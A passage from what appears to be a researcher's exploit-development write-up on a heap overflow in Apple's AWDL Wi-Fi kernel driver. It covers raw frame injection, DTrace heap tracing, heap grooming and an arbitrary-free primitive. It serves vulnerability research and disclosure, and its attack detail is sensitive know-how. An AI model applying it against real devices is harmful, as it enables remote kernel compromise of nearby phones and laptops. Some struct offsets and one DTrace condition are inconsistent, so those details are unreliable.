Overflowing into the fields at the end of the peer object


2) Corrupting the lower fields of an IO80211AWDLPeer object groomed next to this one:


Overflowing into the fields at the start of a peer object next to this one


3) Corrupting the lower bytes of another object type we can groom to follow a peer in kalloc.6144:


Overflowing into a different type of object next to this peer in the same zone


4) Meta-grooming the zone allocator to place a peer object at a zone boundary so we can corrupt the early bytes of an object from another zone:



Overflowing into a different type of object in a different zone


We'll revisit these options in greater detail soon.

Getting on the air

At this point we understand enough about the AWDL frame format to start trying to get controlled, arbitrary data going over the air and reach the frame parsing entrypoint.


I tried for a long time to get the open source academic OWL project to build and run successfully, sadly without success. In order to start making progress I decided to write my own AWDL client from scratch. Another approach could have been to write a MacOS kernel module to interact with the existing AWDL driver, which may have simplified some aspects of the exploit but also made others much harder.


I started off using an old Netgear WG111v2 WiFi adapter I've had for many years which I knew could do monitor mode and frame injection, albeit only on 2.4 Ghz channels. It uses an rtl8187 chipset. Since I wanted to use the linux drivers for these adapters I bought a Raspberry Pi 4B to run the exploit.


In the past I've used Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, but since we're going to need a lot of control over injection timing it might not be the best tool. Scapy uses libpcap to interact with the hardware to inject raw frames so I took a look at libpcap. Some googling later I found this excellent tutorial example which demonstrates exactly how to use libpcap to inject a raw 802.11 frame. Let dissect exactly what's required:

Radiotap

We've seen the structure of the data in 802.11 AWDL frames; there will be an ieee80211 header at the start, an Apple OUI, then the AWDL action frame header and so on. If our WiFi adaptor were connected to a WiFi network, this might be enough information to transmit such a frame. The problem is that we're not connected to any network. This means we need to attach some metadata to our frame to tell the WiFi adaptor exactly how it should get this frame on to the air. For example, what channel and with what bandwidth and modulation scheme should it use to inject the frame? Should it attempt re-transmits until an ACK is received? What signal strength should it use to inject the frame?


Radiotap is a standard for expressing exactly this type of frame metadata, both when injecting frames and receiving them. It's a slightly fiddly variable-sized header which you can prepend on the front of a frame to be injected (or read off the start of a frame which you've sniffed.)


Whether the radiotap fields you specify are actually respected and used depends on the driver you are using - a driver may choose to simply not allow userspace to specify many aspects of injected frames. Here's an example radiotap header captured from a AWDL frame using the built-in MacOS packet sniffer on a MacBook Pro. Wireshark has parsed the binary radiotap format for us:



Wireshark parses radiotap headers in pcaps and shows them in a human-readable form


From this radiotap header we can see a timestamp, the data rate used for transmission, the channel (5.220 GHz which is channel 44) and the modulation scheme (OFDM). We can also see an indication of the strength of the received signal and a measure of the noise.


The tutorial gave the following radiotap header:


static uint8_t u8aRadiotapHeader[] = {

  0x00, 0x00, // version

  0x18, 0x00, // size

  0x0f, 0x80, 0x00, 0x00, // included fields

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //timestamp

  0x10, // add FCS

  0x00,// rate

  0x00, 0x00, 0x00, 0x00, // channel

  0x08, 0x00, // NOACK; don't retry

};


With knowledge of radiotap and a basic header it's not too tricky to get an AWDL frame on to the air using the pcap_inject interface and a wireless adaptor in monitor mode:


int pcap_inject(pcap_t *p, const void *buf, size_t size)


Of course, this doesn't immediately work and with some trial and error it seems that the rate and channel fields aren't being respected. Injection with this adaptor seems to only work at 1Mbps, and the channel specified in the radiotap header won't be the one used for injection. This isn't such a problem as we can still easily set the wifi adaptor channel manually:


iw dev wlan0 set channel 6


Injection at 1Mbps is exceptionally slow but this is enough to get a test AWDL frame on to the air and we can see it in Wireshark on another device in monitor mode. But nothing seems to be happening on a target device. Time for some debugging!

Debugging with DTrace

The SEEMOO labs paper had already suggested setting some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages were incredibly helpful but often you want more information than you can get from the logs.


For the initial report PoC I showed how to use the MacOS kernel debugger to modify an AWDL frame which was about to be transmitted. Typically, in my experience, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst you can technically script it using lldb's python bindings, I wouldn't recommend it.


Apple does have one trick up their sleeve however; DTrace! Where the MacOS kernel debugger is awful in my opinion, dtrace is exceptional. DTrace is a dynamic tracing framework originally developed by Sun Microsystems for Solaris. It's been ported to many platforms including MacOS and ships by default. It's the magic behind tools such as Instruments. DTrace allows you to hook in little snippets of tracing code almost wherever you want, both in userspace programs, and, amazingly, the kernel. Dtrace has its quirks. Hooks are written in the D language which doesn't have loops and the scoping of variables takes a little while to get your head around, but it's the ultimate debugging and reversing tool.


For example, I used this dtrace script on MacOS to log whenever a new IO80211AWDLPeer object was allocated, printing it's heap address and MAC address:


self char* mac;

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {

  self->mac = (char*)arg0;

}

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return

  printf("new AWDL peer: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p", self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1); 

}


Here we're creating two hooks, one which runs at a function entry point and the other which runs just before that same function returns. We can use the self-> syntax to pass variables between the entry point and return point and DTrace makes sure that the entries and returns match up properly.


We have to use the mangled C++ symbol in dtrace scripts; using c++filt we can see the demangled version:


$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager

IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)


The entry hook "saves" the pointer to the MAC address which is passed as the first argument; associating it with the current thread and stack frame. The return hook then prints out that MAC address along with the return value of the function (arg1 in a return hook is the function's return value) which in this case is the address of the newly-allocated IO80211AWDLPeer object.


With DTrace you can easily prototype custom heap logging tools. For example if you're targeting a particular allocation size and wish to know what other objects are ending up in there you could use something like the following DTrace script:


/* some globals with values */

BEGIN {

  target_size_min = 97;

  target_size_max = 128;

}

 

fbt:mach_kernel:kalloc_canblock:entry {

  self->size = *(uint64_t*)arg0;

}

 

fbt:mach_kernel:kalloc_canblock:return

/self->size >= target_size_min ||

 self->size <= target_size_max   /

{

  printf("target allocation %x =  %x", self->size, arg1);

  stack();

}


The expression between the two /'s allows the hook to be conditionally executed. In this case limiting it to cases where kalloc_canblock has been called with a size between target_size_min and target_size_max. The built-in stack() function will print a stack trace, giving you some insight into the allocations within a particular size range. You could also use ustack() to continue that stack trace in userspace if this kernel allocation happened due to a syscall for example.


DTrace can also safely dereference invalid addresses without kernel panicking, making it very useful for prototyping and debugging heap grooms. With some ingenuity it's also possible to do things like dump linked-lists and monitor for the destruction of particular objects.


I'd really recommend spending some time learning DTrace; once you get your head around its esoteric programming model you'll find it an immensely powerful tool.

Reaching the entrypoint

Using DTrace to log stack frames I was able to trace the path legitimate AWDL frames took through the code and determine how far my fake AWDL frames made it. Through this process I discovered that there are, at least on MacOS, two AWDL parsers in the kernel: the main one we've already seen inside the IO80211Family kext and a second, much simpler one in the driver for the particular chipset being used. There were three checks in this simpler parser which I was failing, each of which meant my fake AWDL frames never made it to the IO80211Family code:


Firstly, the source MAC address was being validated. MAC addresses actually contain multiple fields: 

The first half of a MAC address is an OUI. The least significant bit of the first byte defines whether the address is multicast or unicast. The second bit defines whether the address is locally administered or globally unique. 


Diagram used under CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju - SVG drawing based on PNG uploaded by User:Vtraveller. This can be found on Wikipedia here


The source MAC address 01:23:45:67:89:ab from the libpcap example was an unfortunate choice as it has the multicast bit set. AWDL only wants to deal with unicast addresses and rejects frames from multicast addresses. Choosing a new MAC address to spoof without that bit set solved this problem.


The next check was that the first two TLVs in the variable-length payload section of the frame must be a type 4 (sync parameters) then a type 6 (service parameters.)


Finally the channel number in the sync parameters had to match the channel on which the frame had actually been received.


With those three issues fixed I was finally able to get arbitrary controlled bytes to appear at the actionFrameReport method on a remote device and the next stage of the project could begin.

A framework for an AWDL client

We've seen that AWDL uses time division multiplexing to quickly switch between the channels used for AWDL (typically 6 and 44) and the channel used by the access point the device is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames sent by AWDL peers you can calculate when they will be listening in the future. The OWL project uses the linux libev library to try to only transmit at the right moment when other peers will be listening.


There are a few problems with this approach for our purposes:


Firstly, and very importantly, this makes targeting difficult. AWDL action frames are (usually) sent to a broadcast destination MAC address (ff:ff:ff:ff:ff:ff.) It's a mesh network and these frames are meant to be used by all the peers for building up the mesh.


Whilst exploiting every listening AWDL device in proximity at the same time would be an interesting research problem and make for a cool demo video, it also presents many challenges far outside the initial scope. I really needed a way to ensure that only devices I controlled would process the AWDL frames I sent.


With some experimentation it turned out that all AWDL frames can also be sent to unicast addresses and devices would still parse them. This presents another challenge as the AWDL virtual interface's MAC address is randomly generated each time the interface is activated. For testing on MacOS it suffices to run:


ifconfig awdl0


to determine the current MAC address. For iOS it's a little more involved; my chosen technique has been to sniff on the AWDL social channels and correlate signal strength with movements of the device to determine its current AWDL MAC.


There's one other important difference when you send an AWDL action frame to a unicast address: if the device is currently listening on that channel and receives the frame, it will send an ACK. This turns out to be extremely helpful. We will end up building some quite complex primitives using AWDL action frames, abusing the protocol to build a weird machine. Being able to tell whether a target device really received a frame or not means we can treat AWDL frames more like a reliable transport medium. For the typical usage of AWDL this isn't necessary; but our usage of AWDL is not going to be typical.


This ACK-sniffing model will be the building block for our AWDL frame injection API.

Acktually receiving ACKs

Just because the ACKs are coming over the air now doesn't mean we actually see them. Although the WiFi adaptor we're using for injection must be technically capable of receiving ACKs (as they are a fundamental protocol building block), being able to see them on the monitor interface isn't guaranteed.


A screenshot of wireshark showing a spoofed AWDL frame followed by an Acknowledgement from the target device.


The libpcap interface is quite generic and doesn't have any way to indicate that a frame was ACKed or not. It might not even be the case that the kernel driver is aware whether an ACK was received. I didn't really want to delve into the injection interface kernel drivers or firmware as that was liable to be a major investment in itself so I tried some other ideas.


ACK frames in 802.11g and 802.11a are timing based. There's a short window after each transmitted frame when the receiver can ACK if they received the frame. It's for this reason that ACK frames don't contain a source MAC address. It's not necessary as the ACK is already perfectly correlated with a source device due to the timing.


If we also listen on our injection interface in monitor mode we might be able to receive the ACK frames ourself and correlate them. As mentioned, not all chipsets and drivers actually give you all the management frames.

 

For my early prototypes, I managed to find a pair in my box of WiFi adaptors where one would successfully inject on 2.4ghz channels at 1Mbps and the other would successfully sniff ACKs on that channel at 1Mbps.


1Mbps is exceptionally slow; a relatively large AWDL frame ends up being on the air for 10ms or more at that speed, so if your availability window is only a few ms you're not going to get many frames per second. Still, this was enough to get going.


The injection framework I built for the exploit uses two threads, one for frame injection and one for ACK sniffing. Frames are injected using the try_inject function, which extracts the spoofed source MAC address and signals to the second sniffing thread to start looking for an ACK frame being sent to that MAC.


Using a pthread condition variable, the injecting thread can then wait for a limited amount of time during which the sniffing thread may or may not see the ACK. If the sniffing thread does see the ACK it can record this fact then signal the condition variable. The injection thread will stop waiting and can check whether the ACK was received.


Take a look at try_inject_internal in the exploit for the mutex and condition variable setup code for this.


There's a wrapper around try_inject called inject which repeatedly calls try_inject until it succeeds. These two methods allow us to do all the timing sensitive and insensitive frame injection we need.


These two methods take a variable number of pkt_buf_t pointers; a simple custom variable-sized buffer wrapper object. The advantage of this approach is that it allows us to quickly prototype new AWDL frame structures without having to write boilerplate code. For example, this is all the code required to inject a basic AWDL frame and re-transmit it until the target receives it:


inject(RT(),

       WIFI(dst, src),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       PKT_END());


Investing a little bit of time building this API saved a lot of time in the long run and made it very easy to experiment with new ideas.


With an injection framework finally up and running we can start to think about how to actually exploit this vulnerability!

The new challenges on A12/A13

The Apple A12 SOC found in the iPhone Xr/Xs contained the first commercially-available ARM CPU implementing the ARM-8.3 optional Pointer Authentication feature. This was released in September 2018. This post from Project Zero researcher Brandon Azad covers PAC and its implementation by Apple in great detail, as does this presentation from the 2019 LLVM developers meeting.


Its primary use is as a form of Control Flow Integrity. In theory all function pointers present in memory should contain a Pointer Authentication Code in their upper bits which will be verified after the pointer is loaded from memory but before it's used to modify control flow.


In almost all cases this PAC instrumentation will be added by the compiler. There's a really great document from the clang team which goes into great detail about the implementation of PAC from a compiler point of view and the security tradeoffs involved. It has a brilliant section on the threat model of PAC which frankly and honestly discusses the cases where PAC may help and the cases where it won't. Documentation like this should ship with every mitigation.


Having a publicly documented threat model helps everyone understand the intentions behind design decisions and the tradeoffs which were necessary. It helps build a common vocabulary and helps to move discussions about mitigations away from a focus on security through obscurity towards a qualitative appraisal of their strengths and weaknesses.


Concretely, the first hurdle PAC will throw up is that it will make it harder to forge vtable pointers.


All OSObject-derived objects have virtual methods. IO80211AWDLPeer, like almost all IOKit C++ classes derives from OSObject so the first field is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can easily gain control of a vtable pointer. This technique was used in Mateusz Jurczyk's Samsung MMS remote exploit and Natalie Silvanovich's remote WebRTC exploit this year.


Kernel virtual calls have gone from looking like this on A11 and below:


LDR   X8, [X20]      ; load vtable pointer

LDR   X8, [X8,#0x38] ; load function pointer from vtable

MOV   X0, X20

BLR   X8             ; call virtual function


to this on A12 and above:


LDR   X8, [X20]           ; load vtable pointer

 

; authenticate vtable pointer using A-family data key and zero context

; if authentication passes, add 0x38 to vtable pointer, load value

; at that address into X9 and store X8+0x38 back to X8 without a PAC

LDRAA X9, [X8,#0x38]!

 

; overwrite the upper 16 bits of X8 with the constant 0xFFFC

; this is a hash of the mangled symbol; constant at each callsite

MOVK  X8, #0xFFFC,LSL#48

MOV   X0, X20

 

; authenticate virtual function pointer with A-family instruction key

; and context value where the upper 16 bits are a hash of the

; virtual function prototype and the lower 48 bits are the runtime

; address of the virtual function pointer in the vtable

BLRAA X9, X8


Diagrammatic view of a C++ virtual call in ARM64e showing the keys and discriminators used


What does that mean in practice?


If we don't have a signing gadget, then we can't trivially point a vtable pointer to an arbitrary address. Even if we could, we'd need a data and instruction family signing gadget with control over the discriminator.


We can swap a vtable pointer with any other A-family 0-context data key signed pointer, however the virtual function pointer itself is signed with a context value consisting of the address of the vtable entry and a hash of the virtual function prototype. This means we can't swap virtual function pointers from one vtable into another one (or more likely into a fake vtable to which we're able to get an A-family data key signed pointer.)


We can swap one vtable pointer for another one to cause a type confusion, however every virtual function call made through that vtable pointer would have to be calling a function with a matching prototype hash. This isn't so improbable; a fundamental building block of object-oriented programming in C++ is to call functions with matching prototypes but different behaviour via a vtable. Nevertheless you'd have to do some thinking to come up with a generic defeat using this approach.


An important observation is that the vtable pointers themselves have no address diversity; they're signed with a zero-context. This means that if we can disclose a signed vtable pointer for an object of type A at address X, we can overwrite the vtable pointer for another object of type A at a different address Y.


This might seem completely trivial and uninteresting but remember: we only have a linear heap buffer overflow. If the vtable pointer had address diversity then for us to be able to safely corrupt fields after the vtable in an adjacent object we'd have to first disclose the exact vtable pointer following the object which we can overflow out of. Instead we can disclose any vtable pointer for this type and it will be valid.


The clang design doc explains why this is:


It is also known that some code in practice copies objects containing v-tables with memcpy, and while this is not permitted formally, it is something that may be invasive to eliminate.


Right at the end of this document they also say "attackers can be devious." On A12 and above we can no longer trivially point the vtable pointer to a fake vtable and gain arbitrary PC control fairly easily. Guess we'll have to get devious :)

Some initial ideas

Initially I continued using the iOS 12 beta 1 kernelcache when searching for exploitation primitives and performing the initial reversing to better understand the layout of the IO80211AWDLPeer object. This turned out to be a major mistake and a few weeks were spent following unproductive leads:


In the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer seemed uninteresting, at least from the perspective of being able to build a stronger primitive from the linear overflow. For this reason my initial ideas looked at corrupting the fields at the beginning of an IO80211AWDLPeer object which I could place subsequently in memory, option 2 which we saw earlier:


Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects fairly easy. The synctree buffer overflow then allows corrupting the lower fields of an IO80211AWDLPeer in addition to the upper fields


Almost certainly we're going to need some kind of memory disclosure primitive to land this exploit. My first ideas for building a memory disclosure primitive involved corrupting the linked-list of peers. The data structure holding the peers is in fact much more complex than a linked list, it's more like a priority queue with some interesting behaviours when the queue is modified and a distinct lack of safe unlinking and the like. I'd expect iOS to start slowly migrating to using data-PAC for linked-list integrity, but for now this isn't the case. In fact these linked lists don't even have the most basic safe-unlinking integrity checks yet.


The start of an IO80211AWDLPeer object looks like this:



All IOKit objects inheriting from OSObject have a vtable and a reference count as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the peer's MAC address and the peer's peer_manager pointer.


My first ideas revolved around trying to partially corrupt a peer linked-list pointer. In hindsight, there's an obvious reason why this doesn't work (which I'll discuss in a bit), but let's remain enthusiastic and continue on for now...


Looking through the places where the linked list of peers seemed to be used it looked like perhaps the IO80211AWDLPeerManager::updatePeerListBloomFilter method might be interesting from the perspective of trying to get data leaked back to us. Let's take a look at it:


IO80211AWDLPeerManager::updatePeerListBloomFilter(){

  int n_peers = this->peers_list.n_elems;

 

  if (!this->peer_bloom_filters_enabled) {

    return 0;

  }

 

  bzero(this->bloom_filter_buf, 0xA00uLL);

  this->n_macs_in_bloom_filter = 0;

 

  IO80211AWDLPeer* peer = this->peers_list.head;

 

  int n_peers_in_filter = 0;

  for (;

       n_peers_in_filter < n_peers && n_peers_in_filter < 0x100;

       n_peers_in_filter++) {

    this->bloom_filter_macs[n_peers_in_filter] = peer.mac;

    peer = peer->flink;

  }

 

  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,

                      0,

                      n_peers_in_filter,

                      this->bloom_filter_macs,

                      this->bloom_filter_buf);

 

  if (n_peers_in_filter){

    this->updateBroadcastMI(9, 1, 0);
  }

 

  return 0;

}


From the IO80211AWDLPeerManager it's reading the peer list head pointer as well as a count of the number of entries in the peer list. For each entry in the list it's reading the MAC address field into an array then builds a bloom filter from that buffer. 


The interesting part here is that the list traversal is terminated using a count of elements which have been traversed rather than by looking for a termination pointer value at the end of the list (eg a NULL or a pointer back to the head element.) This means that potentially if we could corrupt the linked-list pointer of the second-to-last peer to be processed we could point it to a fake peer and get data at a controlled address added into the bloom filter. updateBroadcastMI looks like it will add that bloom filter data to the Master Indication frame in the bloom filter TLV, meaning we could get a bloom filter containing data read from a controlled address sent back to us. Depending on the exact format of the bloom filter it would probably be possible to then recover at least some bits of remote memory.


It's important to emphasize at this point that due to the lack of a remote KASLR leak and also the lack of a remote PAC signing gadget or vtable disclosure, in order to corrupt the linked-list pointer of an adjacent peer object we have no option but to corrupt its vtable pointer with an invalid value. This means that if any virtual methods were called on this object, it would almost certainly cause a kernel panic.


The first part of trying to get this to work was to work out how to build a suitable heap groom such that we could overflow from a peer into the second-to-last peer in the list which would be processed


Both the linked-list order and the virtual memory order need to be groomed to allow a targeted partial overflow of the final linked-list pointer to be traversed. In this layout we'd need to overflow from 2 into 6 to corrupt the final pointer from 6 to 7.


There is a mitigation from a few years ago in play here which we'll have to work around; namely the randomization of the initial zone freelists which adds a slight element of randomness to the order of the allocations you will get for consecutive calls to kalloc for the same size. The randomness is quite minimal however so the trick here is to be able to pad your allocations with "safe" objects such that even though you can't guarantee that you always overflow into the target object, you can mostly guarantee that you'll overflow into that object or a safe object.


We need two primitives: Firstly, we need to understand the semantics of the list. Secondly, we need some safe objects.

The peer list

With a bit of reversing we can determine that the code which adds peers to the list doesn't simply add them to the start. Peers which are first seen on a 2.4GHz channel (6) do get added this way, but peers first seen on a 5GHz channel (44) are inserted based on their RSSI (received signal strength indication - a unitless value approximating signal strength.) Stronger signals mean the peer is probably physically closer to the device and will also be closer to the start of the list. This gives some nice primitives for manipulating the list and ensuring we know where peers will end up.

Safe objects

The second requirement is to be able to allocate arbitrary, safe objects. Our ideal heap grooming/shaping objects would have the following primitives:


1) arbitrary size

2) unlimited allocation quantity

3) allocation has no side effects

4) controlled contents

5) contents can be safely corrupted

6) can be free'd at an arbitrary, controlled point, with no side effects


Of course, we're completely limited to objects we can force to be allocated remotely via AWDL so all the tricks from local kernel exploitation don't work. For example, I and others have used various forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to build these primitives. None of these are going to work at all. AWDL is sufficiently complicated however that after some reversing I found a pretty good candidate object.

Service response descriptor (SRD)

This is my reverse-engineered definition of the services response descriptor TLV (type 2):


{ u8  type

  u16 len

  u16 key_len

  u8  key_val[key_len]

  u16 value_total_size

  u16 fragment_offset

  u8  fragment[len-key_len-6] }


It has two variable-sized fields: key_val and fragment. The key_length field defines the length of the key_val buffer, and the length of fragment is the remaining space left at the end of the TLV. The parser for this TLV makes a kalloc allocation of val_length, an arbitrary u16. It then memcpy's from fragment into that kalloc buffer at offset frag_offset:


The service_response technique gives us a powerful heap grooming primitive


I believe this is supposed to be support for receiving out-of-order fragments of service request responses. It gives us a very powerful primitive for heap grooming. We can choose an arbitrary allocation size up to 64k and write an arbitrary amount of controlled data to an arbitrary offset in that allocation and we only need to provide the offset and content bytes.


This also gives us a kind of amplification primitive. We can bundle quite a lot of these TLVs in one frame allowing us to make megabytes of controlled heap allocations with minimal side effects in just one AWDL frame.


This SRD technique in fact almost completely meets criteria 1-5 outlined above. It's almost perfect apart from one crucial point; how can we free these allocations?


Through static reversing I couldn't find how these allocations would be free'd, so I wrote a dtrace script to help me find when those exact kalloc allocations were free'd. Running this dtrace script then running a test AWDL client sending SRDs I saw the allocation but never the free. Even disabling the AWDL interface, which should clean up most of the outstanding AWDL state, doesn't cause the allocation to be freed.


This is possibly a bug in my dtrace script, but there's another theory: I wrote another test client which allocated a huge number of SRDs. This allocated a substantial amount of memory, enough to be visible using zprint. And indeed, running that test client repeatedly then running zprint you can observe the inuse count of the target zone getting larger and larger. Disabling AWDL doesn't help, neither does waiting overnight. This looks like a pretty trivial memory leak.


Later on we'll examine the cause of this memory leak but for now we have a heap allocation primitive which meets criteria 1-5, that's probably good enough!

A first attempt at a useful corruption

I managed to build a heap groom which gets the linked-list and heap objects set up such that I can overflow into the second-to-last peer object to be processed:


By surrounding peer objects with a sufficient number of safe objects we can ensure that the linear corruption either hits the right peer object or a safe object


The trick is to ensure that the ratio of safe objects to peers is sufficiently high that you can be (reasonably) sure that the two target peers will only be next to each other or next to safe objects (they won't be next to other peers in the list.) Even though you may not be able to force the two peers to be in the correct order as shown in the diagram, you can at least make the corruption safe if they aren't, then try again.


When writing the code to build the SyncTree TLV I realized I'd made a huge oversight...


My initial idea had been to only partially overwrite a valid linked-list pointer element:


If we could partially overflow the peer_list_flink pointer we could potentially move it to point it somewhere nearby. In this illustration by moving it down by 8 bytes we could potentially get some bytes of a peer_list_blink added to the peer MACs bloom filter. A partial overwrite doesn't directly give a relative add or subtract primitive, but with some heap grooming overwriting the lower 2 bytes can yield something similar


But when you actually look more closely at the memory layout taking into account the limitations of the corruption primitive:


Computing the relative offsets between two IO80211AWDLPeers next to each other in memory it turns out that a useful partial overwrite of peer_list_flink isn't possible as it lies on a 6-byte boundary from the lower peer's sync_tree_macs array


This is not a useful type of partial overwrite and it took a lot of effort to make this heap groom work only to realize in hindsight this obvious oversight.


Attempting to salvage something from all this work I tried instead to just completely overwrite the linked-list pointer. We'd still need some other vulnerability or technique to determine what we should overwrite with but it would at least be some progress to see a read or write from a controlled address.


Alas, whilst I'm able to do the overflow, it appears that the linked-list of peers is being continually traversed in the background even when there's no AWDL traffic and virtual methods are being called on each peer. This will make things significantly harder without first knowing a vtable pointer.


Another option would be to trigger the SyncTree overflow twice during the parsing of a single frame. Recall the code in actionFrameReport


IO80211AWDLPeer::actionFrameReport

...

      case 0x14:

        if (tlv_cnt[0x14] >= 2)

          goto ERR;

        tlv_cnt[0x14]++;

        this->parseAwdlSyncTreeTLV(bytes);


I explored places where a TLV would trigger a peer list traversal. The idea would then be to sandwich a controlled lookup between two SyncTree TLVs, the first to corrupt the list and the second to somehow make that safe. There were some code paths like this, where we could cause a controlled peer to be looked up in the peer list. There were even some places where we could potentially get a different memory corruption primitive from this but they looked even trickier to exploit. And even then you'd not be able to reset the peer list pointer with the second overflow anyway.

Reset

Thus far none of my ideas for a read panned out; messing with the linked list without a correctly PAC'd vtable pointer just doesn't seem feasible. At this point I'd probably consider looking for a second vulnerability. For example, in Natalie's recent WebRTC exploit she was able to find a second vulnerability to defeat ASLR.


There are still some other ideas left open but they seem tricky to get right:


The other major type of object in the kalloc.6144 zone are ipc_kmsg's for some IOKit methods. These are in-flight mach messages and it might be possible to corrupt them such that we could inject arbitrary mach messages into userspace. This idea seems mostly to create new challenges rather than solve any open ones though.


If we don't target the same zone then we could try a cross-zone attack, but even then we're quite limited by the primitives offered by AWDL. There just aren't that many interesting objects we can allocate and manipulate.


By this point I've invested a lot of time into this project and am not willing to give up. I've also been hearing very faint whispers that I might have accidentally stumbled upon an attack surface which is being actively exploited. Time to try one more thing...

Getting up to date

Up until this point I'd been doing most of my reversing using the partially symbolized iOS 12 beta 1 kernelcache. I had done a considerable amount of reversing engineering to build up a reasonable idea of all the fields in the IO80211AWDLPeer object which I could corrupt and it wasn't looking promising. But this vulnerability was only going to get patched in iOS 13.3.1.


Can they have added new fields in iOS 13? It seemed unlikely but of course worth a look.


Here's my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:


struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {

/* +0x0000 */  void *vtable;

/* +0x0008 */  uint32_t ref_cnt;

/* +0x000C */  uint32_t bucket;

/* +0x0010 */  void *peer_list_flink;

/* +0x0018 */  void *peer_list_blink;

/* +0x0020 */  struct ether_addr peer_mac;

/* +0x0026 */  uint8_t pad1[2];

/* +0x0028 */  struct IO80211AWDLPeerManager *peer_manager;

/* +0x0030 */  uint8_t pad8[384];

/* +0x01B0 */  uint16_t HT_FLAGS;

/* +0x01B2 */  uint8_t HT_features[26];

/* +0x01CC */  uint8_t HT_caps;

/* +0x01CD */  uint8_t pad10[14];

/* +0x01DB */  uint8_t VHT_caps;

/* +0x01DC */  uint8_t pad9[732];

/* +0x0418 */  uint8_t added_to_fw_cache;

/* +0x04B9 */  uint8_t is_on_correct_infra_channel;

/* +0x04BA */  uint8_t pad0[6];

/* +0x04C0 */  uint32_t nsync_total_len;

/* +0x0404 */  uint8_t nsync_tlv_buf[64];

/* +0x0504 */  uint32_t flags_from_dp_tlv;

/* +0x0508 */  uint8_t pad14[19];

/* +0x051B */  uint32_t n_sync_tree_macs;

/* +0x0517 */  uint8_t pad20[126];

/* +0x059D */  uint8_t peer_infra_channel;

/* +0x059E */  struct ether_addr peer_infra_mac;

/* +0x05A4 */  struct ether_addr some_other_mac;

/* +0x05AA */  uint8_t country_code[3];

/* +0x05AD */  uint8_t pad5[41];

/* +0x05D6 */  uint16_t social_channels;

/* +0x0508 */  uint64_t last_AF_timestamp;

/* +0x05E0 */  uint8_t pad17[116];

/* +0x0654 */  uint8_t chanseq_encoding;

/* +0x0655 */  uint8_t chanseq_count;

/* +0x0656 */  uint8_t chanseq_step_count;

/* +0x0657 */  uint8_t chanseq_dup_count;

/* +0x0658 */  uint8_t pad19[4];

/* +0x0650 */  uint16_t chanseq_fill_channel;

/* +0x065E */  uint8_t chanseq_channels[32];

/* +0x067E */  uint8_t pad2[64];

/* +0x06BE */  uint8_t raw_chanseq[64];

/* +0x06FE */  uint8_t pad18[194];

/* +0x07C0 */  uint64_t last_UMI_update_timestamp;

/* +0x0708 */  struct IO80211AWDLPeer *UMI_chain_flink;

/* +0x07D0 */  uint8_t pad16[8];

/* +0x07D8 */  uint8_t is_in_umichain;

/* +0x0709 */  uint8_t pad15[79];

/* +0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;

/* +0x0829 */  uint8_t pad12[2];

/* +0x082B */  uint8_t SDB_mode;

/* +0x082C */  uint8_t pad6[28];

/* +0x0848 */  uint8_t did_parse_datapath_tlv;

/* +0x0849 */  uint8_t pad7[1011];

/* +0x0C3C */  uint32_t UMI_feature_mask;

/* +0x0C40 */  uint8_t pad22[2568];

/* +0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;  // NEW FIELD

/* +0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD

}

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You can define and edit structures in C-syntax like this using the Local Types window in IDA: right-clicking a type and selecting "Edit..." brings up an interactive edit window; it's very helpful for reversing complex data structures such as this.


There are new fields! In fact, there's a new pointer field and length field right at the end of the IO80211AWDLPeer object. But what is a steering_msg_blob? What is BSS Steering?

BSS Steering

Let's take a look at where the steering_msg_blob pointer is used.


It's allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, via the following call stack:


IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine


bssSteeringStateMachine is called from many places, including IO80211AWDLPeer::actionFrameReport when it parses a BSS Steering TLV (type 0x1d), so it looks like we can indeed drive this state machine remotely somehow.


The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:


  steering_msg_blob = this->steering_msg_blob;

  if ( steering_msg_blob )

  {

    kfree(steering_msg_blob, this->steering_msg_blob_size);


This gives us our first new primitive: an arbitrary free. Without needing to reverse any of the BSS Steering code we can quite easily overflow from the sync_tree_macs field into the steering_msg_blob and steering_msg_blog_size fields, setting them to arbitrary values.


If we then wait for the peer to timeout and be destroyed, when ::freeResources is called it will call kfree with our arbitrary pointer and size.


The steering_msg_blob is also used in one more place:


